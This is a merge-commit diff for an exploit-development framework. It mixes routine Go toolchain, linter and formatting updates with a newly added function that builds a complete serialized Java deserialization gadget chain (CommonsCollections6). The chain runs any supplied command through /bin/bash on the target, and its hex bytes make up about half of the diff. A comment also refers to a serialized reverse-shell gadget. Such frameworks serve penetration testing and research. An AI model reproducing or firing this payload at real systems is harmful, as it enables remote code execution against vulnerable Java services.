Merge branch 'vulncheck-oss:main' into shellserver-sync-fix

Author: lobsterjerusalem

.github/workflows/go.yml

@@ -19,10 +19,10 @@ jobs:
     - name: Set up Go
       uses: actions/setup-go@v4
       with:
-        go-version: '1.23.1'
+        go-version: '1.24.1'
 
     - name: Install golangci-lint
-      run: curl -sSfL https://raw.githubusercontent.com/golangci/golangci-lint/master/install.sh | sh -s -- -b $(go env GOPATH)/bin v1.60.3
+      run: curl -sSfL https://raw.githubusercontent.com/golangci/golangci-lint/master/install.sh | sh -s -- -b $(go env GOPATH)/bin v1.64.7
 
     - name: Build
       run: go build -v ./...

.golangci.yml

@@ -6,7 +6,6 @@ linters:
 # https://golangci-lint.run/usage/linters/
 
   enable:
-
     - errcheck
     - gosimple
     - govet
@@ -53,6 +52,9 @@ linters:
     - goimports
     - gomoddirectives
     - gomodguard
+    #- goprintffuncname
+    #- gosec
+    - gosmopolitan
     - grouper
     - importas
     - interfacebloat
@@ -62,17 +64,24 @@ linters:
     - makezero
     - mirror
     - misspell
+    #- mnd
+    - musttag
     - nakedret
     #- nestif
     - nilerr
+    - nilnesserr
     - nilnil
     - nlreturn
+    #- noctx
     - nolintlint
     - nonamedreturns
+    - perfsprint
     - prealloc
     - predeclared
     - promlinter
+    - protogetter
     - reassign
+    - recvcheck
     - revive
     - rowserrcheck
     - sloglint
@@ -82,15 +91,15 @@ linters:
     - stylecheck
     - tagalign
     - tagliatelle
-    - tenv
+    - testifylint
     - unconvert
     - unparam
     - usestdlibvars
     #- varnamelen
     - wastedassign
     - whitespace
     - wrapcheck
-
+    - zerologlint
 
 linters-settings:
   cyclop:

cli/commandline.go

@@ -488,28 +488,28 @@ func printDetails(conf *config.Config) {
 		customFlags = append(customFlags, CustomFlag{
 			Name:    key,
 			Type:    fmt.Sprintf("%T", *value),
-			Default: fmt.Sprintf("%v", *value),
+			Default: *value,
 		})
 	}
 	for key, value := range conf.UintFlagsMap {
 		customFlags = append(customFlags, CustomFlag{
 			Name:    key,
 			Type:    fmt.Sprintf("%T", *value),
-			Default: fmt.Sprintf("%v", *value),
+			Default: strconv.FormatUint(uint64(*value), 10),
 		})
 	}
 	for key, value := range conf.IntFlagsMap {
 		customFlags = append(customFlags, CustomFlag{
 			Name:    key,
 			Type:    fmt.Sprintf("%T", *value),
-			Default: fmt.Sprintf("%v", *value),
+			Default: strconv.Itoa(*value),
 		})
 	}
 	for key, value := range conf.BoolFlagsMap {
 		customFlags = append(customFlags, CustomFlag{
 			Name:    key,
 			Type:    fmt.Sprintf("%T", *value),
-			Default: fmt.Sprintf("%v", *value),
+			Default: strconv.FormatBool(*value),
 		})
 	}
 

framework.go

@@ -210,7 +210,7 @@ func doVerify(sploit Exploit, conf *config.Config) bool {
 	if result {
 		output.PrintFrameworkSuccess("Target verification succeeded!", "host", conf.Rhost, "port", conf.Rport, "verified", true)
 	} else {
-		output.PrintFrameworkStatus(fmt.Sprintf("The target isn't recognized as %s", conf.Product), "host", conf.Rhost, "port", conf.Rport, "verified", false)
+		output.PrintFrameworkStatus("The target isn't recognized as "+conf.Product, "host", conf.Rhost, "port", conf.Rport, "verified", false)
 	}
 
 	return result
@@ -381,7 +381,7 @@ func doScan(sploit Exploit, conf *config.Config) bool {
 // Prints the version to the log file using status VERSION and a parsable version string (version=).
 // Additionally, updates the database if it's in use. Typically should be called from the exploit.
 func StoreVersion(conf *config.Config, version string) {
-	output.PrintVersion(fmt.Sprintf("The reported version is %s", version), conf.Rhost, conf.Rport, version)
+	output.PrintVersion("The reported version is "+version, conf.Rhost, conf.Rport, version)
 	db.UpdateVerified(conf.Product, true, version, conf.Rhost, conf.Rport)
 }
 

go.mod

@@ -1,6 +1,6 @@
 module github.com/vulncheck-oss/go-exploit
 
-go 1.23.1
+go 1.24.1
 
 require (
 	github.com/lor00x/goldap v0.0.0-20240304151906-8d785c64d1c8

java/javagadget.go

@@ -15,10 +15,139 @@ func ErrorInvalidCommandLength(msg string) error {
 	return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
 }
 
-// the allocated space (255).
-func Commons11CommandBytecode(commandStr string) ([]byte, error) {
+// This payload was generated using ysoserial-modified with the CommonsCollections6 gadget and the bash shell arg
+// The benefit of this payload over one generated from the unmodified ysoserial is the you do not need to
+// prepend it with a bash -c, and the spaces do not need to be replaced with $IFS.
+// It also solves redirection issues that are present in unmodified ysoserial payloads.
+// This payload will always run the provided command using bash, hence the name.
+// That said you should not need, nor should you prepend a <shell> -c to commandStr parameter passed here.
+func Commons6ModifiedBashCommandBytecode(commandStr string) (string, error) {
 	if len(commandStr) > 255 || len(commandStr) < 1 {
-		return []byte{}, ErrorInvalidCommandLength("command must be between 1 and 255 characters")
+		return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters")
+	}
+
+	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" +
+		"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65" +
+		"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00" +
+		"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00" +
+		"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e" +
+		"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" +
+		"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" +
+		"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e" +
+		"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79" +
+		"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c" +
+		"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76" +
+		"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" +
+		"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c" +
+		"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61" +
+		"\x70\x3b\x78\x70\x74\x00\x03\x66\x6f\x6f\x73\x72" +
+		"\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" +
+		"\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c" +
+		"\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70" +
+		"\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82" +
+		"\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61" +
+		"\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67" +
+		"\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d" +
+		"\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69" +
+		"\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72" +
+		"\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72" +
+		"\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d" +
+		"\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74" +
+		"\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72" +
+		"\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61" +
+		"\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec" +
+		"\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54" +
+		"\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74" +
+		"\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63" +
+		"\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63" +
+		"\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54" +
+		"\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78" +
+		"\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61" +
+		"\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e" +
+		"\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e" +
+		"\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65" +
+		"\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00" +
+		"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f" +
+		"\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f" +
+		"\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63" +
+		"\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f" +
+		"\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54" +
+		"\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76" +
+		"\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09" +
+		"\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x71\x00\x7e" +
+		"\x00\x03\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61" +
+		"\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d" +
+		"\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+		"\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70" +
+		"\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73" +
+		"\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73" +
+		"\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e" +
+		"\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f" +
+		"\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38" +
+		"\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74" +
+		"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
+		"\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b" +
+		"\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74" +
+		"\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
+		"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69" +
+		"\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00" +
+		"\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
+		"\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00" +
+		"\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" +
+		"\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f" +
+		"\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00" +
+		"\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69" +
+		"\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61" +
+		"\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b" +
+		"\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78" +
+		"\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d" +
+		"\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1b\x00" +
+		"\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e" +
+		"\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0" +
+		"\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70" +
+		"\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x13" +
+		"\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x02\x70\x75" +
+		"\x71\x00\x7e\x00\x18\x00\x00\x00\x00\x74\x00\x06" +
+		"\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1b" +
+		"\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61" +
+		"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74" +
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78" +
+		"\x70\x76\x71\x00\x7e\x00\x18\x73\x71\x00\x7e\x00" +
+		"\x13\x75\x71\x00\x7e\x00\x18\x00\x00\x00\x01\x75" +
+		"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61" +
+		"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2" +
+		"\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00" +
+		"\x00\x00\x03\x74\x00\x09\x2f\x62\x69\x6e\x2f\x62" +
+		"\x61\x73\x68\x74\x00\x02\x2d\x63\x74\x00\xff" +
+
+		// 255 characters were allocated, we just put back the unused
+		// length as spaces
+		commandStr + strings.Repeat(" ", 0xff-len(commandStr)) +
+
+		"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00" +
+		"\x7e\x00\x1b\x00\x00\x00\x01\x76\x71\x00\x7e\x00" +
+		"\x2c\x73\x71\x00\x7e\x00\x0f\x73\x72\x00\x11\x6a" +
+		"\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74" +
+		"\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38" +
+		"\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78" +
+		"\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" +
+		"\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b" +
+		"\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01" +
+		"\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69" +
+		"\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda" +
+		"\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c" +
+		"\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09" +
+		"\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f" +
+		"\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00" +
+		"\x10\x00\x00\x00\x00\x78\x78\x78"
+
+	return payloadBytes, nil
+}
+
+// Generated using ysoserial with CommonsCollections10.
+func Commons10CommandBytecode(commandStr string) (string, error) {
+	if len(commandStr) > 255 || len(commandStr) < 1 {
+		return "", ErrorInvalidCommandLength("command must be between 1 and 255 characters")
 	}
 
 	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" +
@@ -283,7 +412,7 @@ func Commons11CommandBytecode(commandStr string) ([]byte, error) {
 		"\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08" +
 		"\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
 
-	return []byte(payloadBytes), nil
+	return payloadBytes, nil
 }
 
 // This is a serialized java reverse shell. The gadget was generated by ysoserial

protocol/afp/afp.go

@@ -796,7 +796,6 @@ func GetAppl(conn net.Conn, volID uint16, creator [4]byte, aIndex uint16, bitmap
 	return response, ok
 }
 
-
 // Sends the setfileparams command to the AFP server.
 func SetFilParams(conn net.Conn, volID uint16, dirID uint32, bitmap uint16, path string, buffer []byte) bool {
 	data := []byte{}
@@ -830,7 +829,6 @@ func SetFilParams(conn net.Conn, volID uint16, dirID uint32, bitmap uint16, path
 	return ok
 }
 
-
 // Sends the Delete command to the AFP server.
 func Delete(conn net.Conn, volumeID uint16, dirID uint32, path string) bool {
 	// requires protocol 3.2 and specific support configured at build time.

protocol/httphelper.go

@@ -67,7 +67,7 @@ func BuildURI(paths ...string) string {
 
 // BasicAuth takes a username and password and returns a string suitable for an Authorization header.
 func BasicAuth(username, password string) string {
-	return fmt.Sprintf("Basic %s", transform.EncodeBase64(username+":"+password))
+	return "Basic " + transform.EncodeBase64(username+":"+password)
 }
 
 func parseCookies(headers []string) string {

protocol/tcpsocket.go

@@ -110,7 +110,7 @@ func TCPReadAmount(conn net.Conn, amount int) ([]byte, bool) {
 	return reply, true
 }
 
-// Read an amount and dont log errors if we fail to read from the socket
+// Read an amount and dont log errors if we fail to read from the socket.
 func TCPReadAmountBlind(conn net.Conn, amount int) ([]byte, bool) {
 	reply := make([]byte, amount)
 	totalRead := 0